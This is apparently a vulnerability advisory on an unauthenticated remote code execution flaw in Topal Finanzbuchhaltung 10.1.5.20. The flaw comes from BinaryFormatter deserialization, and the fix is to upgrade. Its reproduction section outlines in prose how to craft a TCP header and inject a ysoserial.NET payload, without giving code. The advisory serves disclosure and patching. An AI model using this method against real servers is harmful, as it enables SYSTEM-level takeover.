Topal Solutions AG Topal Finanzbuchhaltung Deserialization Vulnerability Leading to Unauthenticated Remote Code Execution
Vulnerability
A deserialization vulnerability allowing remote code execution has been identified in Topal Solutions AG's Topal Finanzbuchhaltung software for Windows, specifically in version 10.1.5.20. The issue arises from the application deserializing untrusted data using the BinaryFormatter, a practice known to be insecure. This vulnerability can be exploited remotely and without authentication, as the server process runs with SYSTEM privileges.
Impact
Exploitation of this vulnerability allows for remote code execution on the server, with the executed code running under the SYSTEM account, providing full permissions.
Reproduction
The vulnerability can be reproduced by manipulating the header of a TCP-based message sent to the Topal Server. The header can be crafted to disable XML compression and enable the use of BinaryFormatter for deserialization. Once the message is received by the server, a serialized payload can be injected that, when deserialized, executes arbitrary code. This can be achieved using tools like ysoserial.NET to create a payload that triggers a web request via PowerShell, which can then be used to confirm the execution of the injected code.
Remediation
Users can upgrade to Topal Finanzbuchhaltung version 11.2.12.00 to address this vulnerability.